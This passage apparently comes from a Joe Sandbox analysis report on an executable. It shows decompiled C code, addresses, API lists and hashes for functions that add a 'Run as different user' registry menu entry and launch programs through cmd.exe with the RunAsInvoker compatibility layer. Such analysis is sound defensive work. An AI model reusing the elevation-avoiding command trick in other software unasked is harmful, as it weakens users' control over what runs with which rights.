                                                          										_t64 =  *_t48;
                                                          										_t48 = _t48 + 2;
                                                          									} while (_t64 != 0);
                                                          									_t78 = RegSetValueW(_v1580, 0, 1,  &_v1044, (_t48 - _t75 >> 1) + (_t48 - _t75 >> 1));
                                                          									RegCloseKey(_v1580);
                                                          								}
                                                          								RegCloseKey(_v1568);
                                                          							}
                                                          							RegCloseKey(_v1572);
                                                          						}
                                                          						RegCloseKey(_v1584);
                                                          					}
                                                          					_t68 = _v1576;
                                                          					RegCloseKey(_v1576);
                                                          					_t31 = _t78;
                                                          				}
                                                          				return E0040318A(_t31, _t55, _v4 ^ _t82, _t68, _t77, _t78);
                                                          			}


























                                                          0x004019f0
                                                          0x004019f0
                                                          0x004019f6
                                                          0x004019fd
                                                          0x00401a0d
                                                          0x00401a15
                                                          0x00401a2c
                                                          0x00401a30
                                                          0x00401a51
                                                          0x00401a55
                                                          0x00401a78
                                                          0x00401a7c
                                                          0x00401a84
                                                          0x00401a89
                                                          0x00401a8b
                                                          0x00401a8b
                                                          0x00401aa7
                                                          0x00401aa9
                                                          0x00401aad
                                                          0x00401ac9
                                                          0x00401acb
                                                          0x00401acf
                                                          0x00401ae0
                                                          0x00401ae8
                                                          0x00401b07
                                                          0x00401b08
                                                          0x00401b0d
                                                          0x00401b19
                                                          0x00401aea
                                                          0x00401aee
                                                          0x00401aef
                                                          0x00401af4
                                                          0x00401b00
                                                          0x00401b00
                                                          0x00401b1a
                                                          0x00401b1f
                                                          0x00401b26
                                                          0x00401b29
                                                          0x00401b30
                                                          0x00401b30
                                                          0x00401b33
                                                          0x00401b36
                                                          0x00401b5f
                                                          0x00401b61
                                                          0x00401b61
                                                          0x00401b68
                                                          0x00401b68
                                                          0x00401b6f
                                                          0x00401b6f
                                                          0x00401b76
                                                          0x00401b76
                                                          0x00401b78
                                                          0x00401b7d
                                                          0x00401b7f
                                                          0x00401b81
                                                          0x00401b98

                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000004,00000000,?,00000000,?), ref: 00401A2C
                                                          • RegCreateKeyExW.ADVAPI32(?,.exe,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A49
                                                          • RegCreateKeyExW.ADVAPI32(?,Shell,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A76
                                                          • RegCreateKeyExW.ADVAPI32(?,Run as different user (netonly)...,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401AA7
                                                          • RegCreateKeyExW.ADVAPI32(?,Command,00000000,00000000,00000000,00000006,00000000,?,00000000), ref: 00401AC9
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401AE0
                                                          • _swprintf.LIBCMT ref: 00401B1A
                                                          • RegSetValueW.ADVAPI32(?,00000000,00000001,?), ref: 00401B54
                                                          • RegCloseKey.ADVAPI32(?), ref: 00401B61
                                                          • RegCloseKey.ADVAPI32(?), ref: 00401B68
                                                          • RegCloseKey.ADVAPI32(?), ref: 00401B6F
                                                          • RegCloseKey.ADVAPI32(?), ref: 00401B76
                                                          • RegCloseKey.ADVAPI32(?), ref: 00401B7D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: CloseCreate$FileModuleNameValue_swprintf
                                                          • String ID: "%s" "%%1" %%*$"%s" /netonly "%%1" %%*$.exe$Command$Run as different user (netonly)...$Run as different user...$Shell
                                                          • API String ID: 2816765105-3583415818
                                                          • Opcode ID: fd094dcd363d27c0bf250ac2475080b10ccc28c413ec764f82221b39573ebeb1
                                                          • Instruction ID: 96684db5b3ddf41ef19364bd1cce9cce62b50f6402ace901a6fc09d749ff9c79
                                                          • Opcode Fuzzy Hash: fd094dcd363d27c0bf250ac2475080b10ccc28c413ec764f82221b39573ebeb1
                                                          • Instruction Fuzzy Hash: 6A416E726443017BE320DB64CC46FABB7ACABC8B54F40491DB744AB2D0DAB4F90487A9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 461 406798-4067a8 GetModuleHandleA 462 4067b3-4067fb GetProcAddress * 4 461->462 463 4067aa-4067b2 call 4064ec 461->463 465 406813-406832 462->465 466 4067fd-406804 462->466 467 406837-406845 TlsAlloc 465->467 466->465 469 406806-40680d 466->469 470 406917 467->470 471 40684b-406856 TlsSetValue 467->471 469->465 472 40680f-406811 469->472 473 406919-40691b 470->473 471->470 474 40685c-406861 call 406c99 471->474 472->465 472->467 477 406867 call 4063cc 474->477 478 40686c-406872 477->478 479 406877 call 4063cc 478->479 480 40687c-406882 479->480 481 406887 call 4063cc 480->481 482 40688c-406892 481->482 483 406897 call 4063cc 482->483 484 40689c-4068a4 call 403de2 483->484 486 4068a9-4068ab 484->486 487 406912 call 4064ec 486->487 488 4068ad-4068c8 call 406443 486->488 487->470 488->487 493 4068ca-4068dc call 407c87 488->493 493->487 496 4068de-4068f5 call 406443 493->496 496->487 500 4068f7-406910 call 406529 GetCurrentThreadId 496->500 500->473
                                                          C-Code - Quality: 84%
                                                          			E00406798(void* __ebx, void* __edx, void* __fp0) {
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				_Unknown_base(*)()* _t7;
                                                          				long _t10;
                                                          				void* _t11;
                                                          				int _t12;
                                                          				void* _t18;
                                                          				intOrPtr _t21;
                                                          				intOrPtr* _t23;
                                                          				long _t26;
                                                          				void* _t34;
                                                          				void* _t37;
                                                          				struct HINSTANCE__* _t38;
                                                          				void* _t41;
                                                          				void* _t43;
                                                          				void* _t48;
                                                          
                                                          				_t48 = __fp0;
                                                          				_t37 = __edx;
                                                          				_t30 = __ebx;
                                                          				_t38 = GetModuleHandleA("KERNEL32.DLL");
                                                          				if(_t38 != 0) {
                                                          					 *0x4144f0 = GetProcAddress(_t38, "FlsAlloc");
                                                          					 *0x4144f4 = GetProcAddress(_t38, "FlsGetValue");
                                                          					 *0x4144f8 = GetProcAddress(_t38, "FlsSetValue");
                                                          					_t7 = GetProcAddress(_t38, "FlsFree");
                                                          					__eflags =  *0x4144f0;
                                                          					_t41 = TlsSetValue;
                                                          					 *0x4144fc = _t7;
                                                          					if( *0x4144f0 == 0) {
                                                          						L6:
                                                          						 *0x4144f4 = TlsGetValue;
                                                          						 *0x4144f0 = E004064B1;
                                                          						 *0x4144f8 = _t41;
                                                          						 *0x4144fc = TlsFree;
                                                          					} else {
                                                          						__eflags =  *0x4144f4;
                                                          						if( *0x4144f4 == 0) {
                                                          							goto L6;
                                                          						} else {
                                                          							__eflags =  *0x4144f8;
                                                          							if( *0x4144f8 == 0) {
                                                          								goto L6;
                                                          							} else {
                                                          								__eflags = _t7;
                                                          								if(_t7 == 0) {
                                                          									goto L6;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					_t10 = TlsAlloc();
                                                          					__eflags = _t10 - 0xffffffff;
                                                          					 *0x4138c4 = _t10;
                                                          					if(_t10 == 0xffffffff) {
                                                          						L15:
                                                          						_t11 = 0;
                                                          						__eflags = 0;
                                                          					} else {
                                                          						_t12 = TlsSetValue(_t10,  *0x4144f4);
                                                          						__eflags = _t12;
                                                          						if(_t12 == 0) {
                                                          							goto L15;
                                                          						} else {
                                                          							E00406C99();
                                                          							 *0x4144f0 = E004063CC( *0x4144f0);
                                                          							 *0x4144f4 = E004063CC( *0x4144f4);
                                                          							 *0x4144f8 = E004063CC( *0x4144f8);
                                                          							 *0x4144fc = E004063CC( *0x4144fc);
                                                          							_t18 = E00403DE2(_t30, _t38);
                                                          							__eflags = _t18;
                                                          							if(_t18 == 0) {
                                                          								L14:
                                                          								E004064EC(_t30, _t38);
                                                          								goto L15;
                                                          							} else {
                                                          								_push(E00406677);
                                                          								_t21 =  *((intOrPtr*)(E00406443( *0x4144f0)))();
                                                          								__eflags = _t21 - 0xffffffff;
                                                          								 *0x4138c0 = _t21;
                                                          								if(_t21 == 0xffffffff) {
                                                          									goto L14;
                                                          								} else {
                                                          									_t43 = E00407C87(1, 0x214);
                                                          									__eflags = _t43;
                                                          									if(_t43 == 0) {
                                                          										goto L14;
                                                          									} else {
                                                          										_push(_t43);
                                                          										_push( *0x4138c0);
                                                          										_t23 = E00406443( *0x4144f8);
                                                          										_pop(_t34);
                                                          										__eflags =  *_t23();
                                                          										if(__eflags == 0) {
                                                          											goto L14;
                                                          										} else {
                                                          											_push(0);
                                                          											_push(_t43);
                                                          											E00406529(_t30, _t34, _t37, _t38, _t43, __eflags, _t48);
                                                          											_t26 = GetCurrentThreadId();
                                                          											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
                                                          											 *_t43 = _t26;
                                                          											_t11 = 1;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					return _t11;
                                                          				} else {
                                                          					E004064EC(__ebx, _t38);
                                                          					return 0;
                                                          				}
                                                          			}



















                                                          0x00406798
                                                          0x00406798
                                                          0x00406798
                                                          0x004067a4
                                                          0x004067a8
                                                          0x004067c8
                                                          0x004067d5
                                                          0x004067e2
                                                          0x004067e7
                                                          0x004067e9
                                                          0x004067f0
                                                          0x004067f6
                                                          0x004067fb
                                                          0x00406813
                                                          0x00406818
                                                          0x00406822
                                                          0x0040682c
                                                          0x00406832
                                                          0x004067fd
                                                          0x004067fd
                                                          0x00406804
                                                          0x00000000
                                                          0x00406806
                                                          0x00406806
                                                          0x0040680d
                                                          0x00000000
                                                          0x0040680f
                                                          0x0040680f
                                                          0x00406811
                                                          0x00000000
                                                          0x00000000
                                                          0x00406811
                                                          0x0040680d
                                                          0x00406804
                                                          0x00406837
                                                          0x0040683d
                                                          0x00406840
                                                          0x00406845
                                                          0x00406917
                                                          0x00406917
                                                          0x00406917
                                                          0x0040684b
                                                          0x00406852
                                                          0x00406854
                                                          0x00406856
                                                          0x00000000
                                                          0x0040685c
                                                          0x0040685c
                                                          0x00406872
                                                          0x00406882
                                                          0x00406892
                                                          0x0040689f
                                                          0x004068a4
                                                          0x004068a9
                                                          0x004068ab
                                                          0x00406912
                                                          0x00406912
                                                          0x00000000
                                                          0x004068ad
                                                          0x004068ad
                                                          0x004068be
                                                          0x004068c0
                                                          0x004068c3
                                                          0x004068c8
                                                          0x00000000
                                                          0x004068ca
                                                          0x004068d6
                                                          0x004068d8
                                                          0x004068dc
                                                          0x00000000
                                                          0x004068de
                                                          0x004068de
                                                          0x004068df
                                                          0x004068eb
                                                          0x004068f0
                                                          0x004068f3
                                                          0x004068f5
                                                          0x00000000
                                                          0x004068f7
                                                          0x004068f7
                                                          0x004068f9
                                                          0x004068fa
                                                          0x00406901
                                                          0x00406907
                                                          0x0040690b
                                                          0x0040690f
                                                          0x0040690f
                                                          0x004068f5
                                                          0x004068dc
                                                          0x004068c8
                                                          0x004068ab
                                                          0x00406856
                                                          0x0040691b
                                                          0x004067aa
                                                          0x004067aa
                                                          0x004067b2
                                                          0x004067b2

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00403AA8), ref: 0040679E
                                                          • __mtterm.LIBCMT ref: 004067AA
                                                            • Part of subcall function 004064EC: TlsFree.KERNEL32(FFFFFFFF,00406917), ref: 00406517
                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004067C0
                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004067CD
                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004067DA
                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004067E7
                                                          • TlsAlloc.KERNEL32 ref: 00406837
                                                          • TlsSetValue.KERNEL32(00000000), ref: 00406852
                                                          • __init_pointers.LIBCMT ref: 0040685C
                                                          • __calloc_crt.LIBCMT ref: 004068D1
                                                          • GetCurrentThreadId.KERNEL32 ref: 00406901
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                          • API String ID: 630932248-3819984048
                                                          • Opcode ID: 59697e22f0d555e3b7d3cb8a22637ef6e66e256eaa5b52333f5b32bc99484974
                                                          • Instruction ID: 7c5ed862ad4e46ccbc4200316f1e50c4686e51c2e14fc2ae8d4e83c3db53f4cc
                                                          • Opcode Fuzzy Hash: 59697e22f0d555e3b7d3cb8a22637ef6e66e256eaa5b52333f5b32bc99484974
                                                          • Instruction Fuzzy Hash: 023166B19003129AD7107FB9BD05B863AA4ABC0724B12853BF821BB2F1DB399554CF7D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 503 402f60-402fcb call 409280 GetShortPathNameW 506 402fd0-402fd9 503->506 506->506 507 402fdb-402fe9 506->507 508 403011-403049 GetModuleFileNameW GetShortPathNameW 507->508 509 402feb 507->509 511 403050 508->511 512 40304b-40304e 508->512 510 402ff0-402ff4 509->510 514 402ff7-403000 510->514 513 403053-403063 LocalAlloc 511->513 512->513 515 403080-40309f call 403926 513->515 516 403065-40307f call 40318a 513->516 514->514 517 403002-40300f 514->517 522 4030a1-4030b4 call 4036e5 515->522 523 4030b6-4030ca call 40360d 515->523 517->508 517->510 528 4030df-4030e4 522->528 529 4030e7-403109 call 40366b * 2 523->529 530 4030cc-4030dc call 4036e5 523->530 528->529 537 403135-40313a 529->537 538 40310b 529->538 530->528 540 40314b-40316a call 40318a 537->540 541 40313c-403148 call 40366b 537->541 539 403110-403133 call 40366b * 2 538->539 539->537 541->540
                                                          C-Code - Quality: 82%
                                                          			E00402F60(void* __ebx, intOrPtr __ecx, WCHAR* __edx, void* __eflags, void* __fp0) {
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				signed int _t39;
                                                          				intOrPtr* _t45;
                                                          				void* _t53;
                                                          				intOrPtr* _t68;
                                                          				void* _t71;
                                                          				void* _t73;
                                                          				signed int _t74;
                                                          				intOrPtr _t85;
                                                          				intOrPtr _t88;
                                                          				void* _t89;
                                                          				short* _t90;
                                                          				void* _t91;
                                                          				void* _t92;
                                                          				void* _t93;
                                                          				WCHAR* _t95;
                                                          				void* _t96;
                                                          				void* _t97;
                                                          				void* _t98;
                                                          				void* _t99;
                                                          				intOrPtr _t101;
                                                          				signed int _t102;
                                                          				signed int _t105;
                                                          				signed int _t106;
                                                          				void* _t107;
                                                          				signed int _t108;
                                                          
                                                          				_t71 = __ebx;
                                                          				_t39 =  *0x413004; // 0xf284055d
                                                          				 *(_t105 + 0x628) = _t39 ^ _t105;
                                                          				_t101 =  *((intOrPtr*)(_t105 + 0x634));
                                                          				_push(_t89);
                                                          				_t95 = __edx;
                                                          				 *((intOrPtr*)(_t105 + 0x24)) = _t101;
                                                          				 *((intOrPtr*)(_t105 + 0x20)) =  *((intOrPtr*)(_t105 + 0x638));
                                                          				 *((intOrPtr*)(_t105 + 0x1c)) = __ecx;
                                                          				 *((short*)(_t105 + 0x28)) = 0;
                                                          				E00409280(_t89, _t105 + 0x22, 0, 0x206);
                                                          				_t106 = _t105 + 0xc;
                                                          				 *((char*)(_t106 + 0x1b)) = 0;
                                                          				GetShortPathNameW(_t95, _t106 + 0x20, 0x104);
                                                          				_t45 = _t106 + 0x1c;
                                                          				_t73 = _t45 + 2;
                                                          				do {
                                                          					_t85 =  *_t45;
                                                          					_t45 = _t45 + 2;
                                                          				} while (_t85 != 0);
                                                          				_t74 = 2;
                                                          				_t96 = (_t45 - _t73 >> 1) + 1;
                                                          				if(__ebx > 2) {
                                                          					do {
                                                          						_t68 =  *((intOrPtr*)(_t101 + _t74 * 4));
                                                          						_t93 = _t68 + 2;
                                                          						do {
                                                          							_t88 =  *_t68;
                                                          							_t68 = _t68 + 2;
                                                          						} while (_t88 != 0);
                                                          						_t74 = _t74 + 1;
                                                          						_t96 = _t96 + (_t68 - _t93 >> 1) + 1;
                                                          					} while (_t74 < _t71);
                                                          				}
                                                          				GetModuleFileNameW(0, _t106 + 0x228, 0x104);
                                                          				_t86 = _t106 + 0x430;
                                                          				GetShortPathNameW(_t106 + 0x22c, _t106 + 0x430, 0x104);
                                                          				if( *((char*)(_t106 + 0x640)) == 0) {
                                                          					_t97 = _t96 + 0x14;
                                                          				} else {
                                                          					_t97 = _t96 + 0x30;
                                                          				}
                                                          				_t90 = LocalAlloc(0, _t97 + _t97);
                                                          				if(_t90 != 0) {
                                                          					_t87 = _t106 + 0x1c;
                                                          					 *_t90 = 0;
                                                          					E00403926(_t106 + 0x1c, 0x104);
                                                          					_t107 = _t106 + 8;
                                                          					if( *((char*)(_t107 + 0x640)) == 0) {
                                                          						_t53 = E0040360D(_t107 + 0x1c, L".msc");
                                                          						_t107 = _t107 + 8;
                                                          						if(_t53 != 0) {
                                                          							E004036E5(_t90, _t97, L"cmd.exe /c \"start ");
                                                          							_t87 =  *((intOrPtr*)(_t107 + 0x1c));
                                                          							 *((char*)( *((intOrPtr*)(_t107 + 0x1c)))) = 1;
                                                          							goto L16;
                                                          						}
                                                          					} else {
                                                          						E004036E5(_t90, _t97, L"cmd.exe /c \"set __COMPAT_LAYER=RunAsInvoker &&");
                                                          						 *((char*)( *((intOrPtr*)(_t107 + 0x1c)))) = 1;
                                                          						L16:
                                                          						 *((char*)(_t107 + 0x1b)) = 1;
                                                          						_t107 = _t107 + 0xc;
                                                          					}
                                                          					E0040366B(_t90, _t97, _t107 + 0x1c);
                                                          					E0040366B(_t90, _t97, 0x4118f0);
                                                          					_t102 = 2;
                                                          					_t108 = _t107 + 0x18;
                                                          					if(_t71 > 2) {
                                                          						do {
                                                          							_t87 =  *((intOrPtr*)( *(_t108 + 0x18) + _t102 * 4));
                                                          							E0040366B(_t90, _t97,  *((intOrPtr*)( *(_t108 + 0x18) + _t102 * 4)));
                                                          							E0040366B(_t90, _t97, 0x4118f0);
                                                          							_t102 = _t102 + 1;
                                                          							_t108 = _t108 + 0x18;
                                                          						} while (_t102 < _t71);
                                                          					}
                                                          					if( *((char*)(_t108 + 0xf)) != 0) {
                                                          						E0040366B(_t90, _t97, 0x4118f4);
                                                          						_t108 = _t108 + 0xc;
                                                          					}
                                                          					 *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x14)))) = _t90;
                                                          					_pop(_t91);
                                                          					_pop(_t98);
                                                          					return E0040318A(0, _t71,  *(_t108 + 0x634) ^ _t108, _t87, _t91, _t98);
                                                          				} else {
                                                          					_t24 = _t90 + 8; // 0x8
                                                          					_pop(_t92);
                                                          					_pop(_t99);
                                                          					return E0040318A(_t24, _t71,  *(_t106 + 0x628) ^ _t106, _t86, _t92, _t99);
                                                          				}
                                                          			}































                                                          0x00402f60
                                                          0x00402f66
                                                          0x00402f6d
                                                          0x00402f7c
                                                          0x00402f84
                                                          0x00402f8a
                                                          0x00402f93
                                                          0x00402f97
                                                          0x00402f9b
                                                          0x00402f9f
                                                          0x00402fa6
                                                          0x00402fab
                                                          0x00402fb9
                                                          0x00402fbe
                                                          0x00402fc4
                                                          0x00402fc8
                                                          0x00402fd0
                                                          0x00402fd0
                                                          0x00402fd3
                                                          0x00402fd6
                                                          0x00402fdf
                                                          0x00402fe6
                                                          0x00402fe9
                                                          0x00402ff0
                                                          0x00402ff0
                                                          0x00402ff4
                                                          0x00402ff7
                                                          0x00402ff7
                                                          0x00402ffa
                                                          0x00402ffd
                                                          0x00403006
                                                          0x0040300b
                                                          0x0040300b
                                                          0x00402ff0
                                                          0x00403020
                                                          0x0040302b
                                                          0x0040303b
                                                          0x00403049
                                                          0x00403050
                                                          0x0040304b
                                                          0x0040304b
                                                          0x0040304b
                                                          0x0040305f
                                                          0x00403063
                                                          0x00403080
                                                          0x0040308a
                                                          0x0040308f
                                                          0x00403094
                                                          0x0040309f
                                                          0x004030c0
                                                          0x004030c5
                                                          0x004030ca
                                                          0x004030d3
                                                          0x004030d8
                                                          0x004030dc
                                                          0x00000000
                                                          0x004030dc
                                                          0x004030a1
                                                          0x004030a8
                                                          0x004030b1
                                                          0x004030df
                                                          0x004030df
                                                          0x004030e4
                                                          0x004030e4
                                                          0x004030ee
                                                          0x004030fa
                                                          0x004030ff
                                                          0x00403104
                                                          0x00403109
                                                          0x00403110
                                                          0x00403114
                                                          0x0040311a
                                                          0x00403126
                                                          0x0040312b
                                                          0x0040312e
                                                          0x00403131
                                                          0x00403110
                                                          0x0040313a
                                                          0x00403143
                                                          0x00403148
                                                          0x00403148
                                                          0x00403156
                                                          0x00403158
                                                          0x00403159
                                                          0x0040316a
                                                          0x00403065
                                                          0x00403065
                                                          0x00403068
                                                          0x00403069
                                                          0x0040307f
                                                          0x0040307f

                                                          APIs
                                                          • _memset.LIBCMT ref: 00402FA6
                                                          • GetShortPathNameW.KERNEL32 ref: 00402FBE
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403020
                                                          • GetShortPathNameW.KERNEL32 ref: 0040303B
                                                          • LocalAlloc.KERNEL32(00000000), ref: 00403059
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: Name$PathShort$AllocFileLocalModule_memset
                                                          • String ID: .msc$cmd.exe /c "set __COMPAT_LAYER=RunAsInvoker &&$cmd.exe /c "start
                                                          • API String ID: 3786246004-2437571064
                                                          • Opcode ID: 4fa69a20af8ed9328d554935d36f2ab083722ec717f1d2048d50260163dd52f2
                                                          • Instruction ID: de00689b0eb6e5bdbbfd2616fea31aee9d38f1499e5edb8031d74eed1a826148
                                                          • Opcode Fuzzy Hash: 4fa69a20af8ed9328d554935d36f2ab083722ec717f1d2048d50260163dd52f2
                                                          • Instruction Fuzzy Hash: F4511671504301ABC320EF55CC46BAB7BE8AFD5309F04482EF549A32C1E7799648C7AB
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 550 40af20-40af42 call 40643a 553 40aff6-40b000 550->553 554 40af48-40af57 LoadLibraryA 550->554 555 40b002-40b008 553->555 556 40b07b-40b083 553->556 557 40b0d6 554->557 558 40af5d-40af6d GetProcAddress 554->558 555->556 559 40b00a-40b023 call 406443 * 2 555->559 560 40b085-40b08e call 406443 556->560 561 40b0b6-40b0c4 call 406443 556->561 562 40b0d8-40b0dc 557->562 558->557 563 40af73-40afb5 call 4063cc GetProcAddress call 4063cc GetProcAddress call 4063cc call 406a72 558->563 559->556 579 40b025-40b027 559->579 560->561 574 40b090-40b097 560->574 561->557 573 40b0c6-40b0d4 561->573 591 40afc4-40afc8 563->591 592 40afb7-40afc1 call 405700 563->592 573->562 574->561 584 40b099-40b0a1 574->584 579->556 583 40b029-40b02d 579->583 593 40b048-40b054 call 406aa9 583->593 594 40b02f-40b040 583->594 584->561 586 40b0a3-40b0ac call 406443 584->586 586->561 595 40b0ae-40b0b3 586->595 591->553 597 40afca-40afe0 GetProcAddress call 4063cc 591->597 592->591 603 40b063-40b067 593->603 604 40b056-40b060 call 405700 593->604 594->593 607 40b042-40b046 594->607 595->561 597->553 611 40afe2-40aff1 GetProcAddress call 4063cc 597->611 609 40b072-40b079 603->609 610 40b069-40b070 603->610 604->603 607->556 607->593 609->561 610->561 611->553
                                                          C-Code - Quality: 43%
                                                          			E0040AF20(void* __edx, void* __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                          				char _v8;
                                                          				intOrPtr _v12;
                                                          				char _v16;
                                                          				char _v20;
                                                          				char _v24;
                                                          				signed char _v28;
                                                          				char _v36;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __ebp;
                                                          				intOrPtr* _t31;
                                                          				intOrPtr* _t34;
                                                          				intOrPtr _t35;
                                                          				intOrPtr* _t37;
                                                          				void* _t41;
                                                          				void* _t43;
                                                          				intOrPtr _t48;
                                                          				intOrPtr _t50;
                                                          				void* _t54;
                                                          				intOrPtr _t56;
                                                          				intOrPtr _t61;
                                                          				void* _t67;
                                                          				void* _t71;
                                                          				void* _t74;
                                                          				intOrPtr* _t75;
                                                          				struct HINSTANCE__* _t76;
                                                          				intOrPtr* _t77;
                                                          				void* _t79;
                                                          				intOrPtr* _t80;
                                                          
                                                          				_t98 = __fp0;
                                                          				_t74 = __edx;
                                                          				_v12 = E0040643A();
                                                          				_v8 = 0;
                                                          				_v16 = 0;
                                                          				_v20 = 0;
                                                          				if( *0x4149b8 != 0) {
                                                          					L8:
                                                          					_t29 =  *0x4149c4;
                                                          					_t61 = _v12;
                                                          					if( *0x4149c4 == _t61 ||  *0x4149c8 == _t61) {
                                                          						L20:
                                                          						_t30 =  *0x4149bc;
                                                          						if( *0x4149bc != _v12) {
                                                          							_t34 = E00406443(_t30);
                                                          							if(_t34 != 0) {
                                                          								_t35 =  *_t34();
                                                          								_v8 = _t35;
                                                          								if(_t35 != 0) {
                                                          									_t36 =  *0x4149c0;
                                                          									if( *0x4149c0 != _v12) {
                                                          										_t37 = E00406443(_t36);
                                                          										if(_t37 != 0) {
                                                          											_v8 =  *_t37(_v8);
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L26;
                                                          					} else {
                                                          						_t77 = E00406443(_t29);
                                                          						_t75 = E00406443( *0x4149c8);
                                                          						if(_t77 == 0 || _t75 == 0) {
                                                          							goto L20;
                                                          						} else {
                                                          							_t41 =  *_t77();
                                                          							if(_t41 == 0) {
                                                          								L15:
                                                          								_t43 = E00406AA9(_t79, _t98,  &_v20);
                                                          								_pop(_t67);
                                                          								if(_t43 != 0) {
                                                          									_push(0);
                                                          									_push(0);
                                                          									_push(0);
                                                          									_push(0);
                                                          									_push(0);
                                                          									E00405700(0, _t67, _t74, _t75);
                                                          								}
                                                          								if(_v20 < 4) {
                                                          									_a12 = _a12 | 0x00040000;
                                                          								} else {
                                                          									_a12 = _a12 | 0x00200000;
                                                          								}
                                                          								L26:
                                                          								_t31 = E00406443( *0x4149b8);
                                                          								if(_t31 == 0) {
                                                          									L28:
                                                          									return 0;
                                                          								}
                                                          								return  *_t31(_v8, _a4, _a8, _a12);
                                                          							}
                                                          							_push( &_v24);
                                                          							_push(0xc);
                                                          							_push( &_v36);
                                                          							_push(1);
                                                          							_push(_t41);
                                                          							if( *_t75() == 0 || (_v28 & 0x00000001) == 0) {
                                                          								goto L15;
                                                          							} else {
                                                          								goto L20;
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t76 = LoadLibraryA("USER32.DLL");
                                                          				if(_t76 == 0 || GetProcAddress(_t76, "MessageBoxA") == 0) {
                                                          					goto L28;
                                                          				} else {
                                                          					_t48 = E004063CC(_t47);
                                                          					 *_t80 = "GetActiveWindow";
                                                          					 *0x4149b8 = _t48;
                                                          					_t50 = E004063CC(GetProcAddress(??, ??));
                                                          					 *_t80 = "GetLastActivePopup";
                                                          					 *0x4149bc = _t50;
                                                          					 *0x4149c0 = E004063CC(GetProcAddress(_t76, _t76));
                                                          					_t54 = E00406A72(_t79, __fp0,  &_v16);
                                                          					_pop(_t71);
                                                          					if(_t54 != 0) {
                                                          						_push(0);
                                                          						_push(0);
                                                          						_push(0);
                                                          						_push(0);
                                                          						_push(0);
                                                          						E00405700(0, _t71, _t74, _t76);
                                                          						_t80 = _t80 + 0x14;
                                                          					}
                                                          					if(_v16 == 2) {
                                                          						_t56 = E004063CC(GetProcAddress(_t76, "GetUserObjectInformationA"));
                                                          						 *0x4149c8 = _t56;
                                                          						if(_t56 != 0) {
                                                          							 *0x4149c4 = E004063CC(GetProcAddress(_t76, "GetProcessWindowStation"));
                                                          						}
                                                          					}
                                                          					goto L8;
                                                          				}
                                                          			}
































                                                          0x0040af20
                                                          0x0040af20
                                                          0x0040af36
                                                          0x0040af39
                                                          0x0040af3c
                                                          0x0040af3f
                                                          0x0040af42
                                                          0x0040aff6
                                                          0x0040aff6
                                                          0x0040affb
                                                          0x0040b000
                                                          0x0040b07b
                                                          0x0040b07b
                                                          0x0040b083
                                                          0x0040b086
                                                          0x0040b08e
                                                          0x0040b090
                                                          0x0040b094
                                                          0x0040b097
                                                          0x0040b099
                                                          0x0040b0a1
                                                          0x0040b0a4
                                                          0x0040b0ac
                                                          0x0040b0b3
                                                          0x0040b0b3
                                                          0x0040b0ac
                                                          0x0040b0a1
                                                          0x0040b097
                                                          0x0040b08e
                                                          0x00000000
                                                          0x0040b00a
                                                          0x0040b016
                                                          0x0040b021
                                                          0x0040b023
                                                          0x00000000
                                                          0x0040b029
                                                          0x0040b029
                                                          0x0040b02d
                                                          0x0040b048
                                                          0x0040b04c
                                                          0x0040b053
                                                          0x0040b054
                                                          0x0040b056
                                                          0x0040b057
                                                          0x0040b058
                                                          0x0040b059
                                                          0x0040b05a
                                                          0x0040b05b
                                                          0x0040b060
                                                          0x0040b067
                                                          0x0040b072
                                                          0x0040b069
                                                          0x0040b069
                                                          0x0040b069
                                                          0x0040b0b6
                                                          0x0040b0bc
                                                          0x0040b0c4
                                                          0x0040b0d6
                                                          0x00000000
